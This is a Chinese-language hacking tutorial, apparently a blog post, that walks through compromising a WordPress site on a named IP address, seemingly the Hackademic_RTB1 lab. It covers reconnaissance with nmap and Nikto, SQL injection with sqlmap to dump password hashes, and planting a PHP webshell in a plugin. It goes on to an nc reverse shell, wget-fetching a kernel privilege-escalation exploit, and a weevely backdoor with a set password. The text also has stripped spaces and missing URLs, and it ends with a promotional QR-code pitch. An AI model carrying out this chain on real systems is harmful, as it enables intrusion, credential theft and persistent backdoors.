黑客破解网页

通过本文你将了解黑客常用的入手思路和技术手法，适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容：

现在我们获取了网站服务器的IP地址为:173.236.138.113寻找同一服务器上的其它网站，我们使用.

173.236.138.113上有26个网站，很多黑客为了攻破你的网站可能会检查同服务器上的其它网站，但是本次是以研究为目标，我们将抛开服务器上的其它网站，只针对你的网站来进行入侵检测。

发现你的Web服务器是apache，接下来确定它的版本.IP:173.236.138.113WebsiteStatus:activeServerType:Apache

AlexaTrend/Rank:1Month:3,213,9683Month:2,161,753

PageViewsperVisit:1Month:2.03Month:3.7接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.

我们现在已经获取了你的网站域名的注册信息，包括你的重要信息等.我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

我们发现你的网站使用了著名的php整站程序wordpress，服务器的的系统类型为FedoraLinux，Web服务器版本Apache2.2.15.继续查看网站服务器开放的端口，用渗透测试工具nmap:1-Findservicesthatrunonserver(查看服务器上运行的服务)

只有80端口是开放的,操作系统是Linux2.6.22（FedoraCore6），现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:Sqlinjection–Blindsqlinjection–LFI–RFI–XSS–CSRF等等.我们将使用Nikto来收集漏洞信息:root@bt:/pentest/web/nikto#perlnikto.pl-h

我们也会用到Backtrack5R1中的W3AF工具:root@bt:/pentest/web/w3af#./w3af_gui

发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞./Hackademic_RTB1/?cat=d％27z％220我们通过工具发现这个URL存在SQL注入，我们通过Sqlmap来检测这个url.Usingsqlmapwith–uurl

我们发现你的网站存在mysql显错注入，mysql数据库版本是5.0.我们通过加入参数”-dbs”来尝试采集数据库名.

发现三个数据库,接下来通过参数”-Dwordpress-tables”来查看wordpress数据库的所有表名

接下来猜解字段user_login和user_pass的值.用参数”-Cuser_login,user_pass–dump”

我们会发现用户名和密码hashes值.我们需要通过以下在线破解网站来破解密码hashes/free-hash-reverse.php

登陆wordpress的后台wp-admin尝试上传phpwebshell到服务器，以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件，编辑插入我们的phpwebshell，点击更新文件，然后访问我们的phpwebshell.

Phpwebshell被解析了，我们可以控制你网站的文件，但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

现在我们知道，服务器的内核版本是2.6.31.5-127.fc12.1686,我们在中搜索此版本的相关漏洞.

在服务器上测试了很多exp之后，我们用以下的exp来提升权限./exploits/15285我们在ncshell上执行以下命令:wget/exploits/15285-ororo.c(下载exp到服务器并重命名为roro.c)

我们可以使用”johntheripper”工具破解所有用户的密码.但是我们不会这样做，我们需要在这个服务器上留下后门以方便我们在任何时候访问它.我们用weevely制作一个php小马上传到服务器上.1.weevely使用选项

root@bt:/pentest/backdoors/web/weevely#./main.py-

2.用weevely创建一个密码为koko的php后门root@bt:/pentest/backdoors/web/weevely#./main.py-g-ohax.php-pkoko

root@bt:/pentest/backdoors/web/weevely#./main.py-t-u/Hackademic_RTB1/wp-content/plugins/hax.php-pkoko

弱口令与口令爆破XSS漏洞CSRF漏洞SSRF漏洞XXE漏洞SQL注入任意文件操作漏洞业务逻辑漏洞

几乎任何一个领域都是这样，所谓“万事开头难”，绝大多数人都卡在第一步，还没开始就自己把自己淘汰出局了。

上述这份完整版的网络安全学习资料已经上传CSDN官方，朋友们如果需要可以微信扫描下方CSDN官方认证二维码即可领取↓↓↓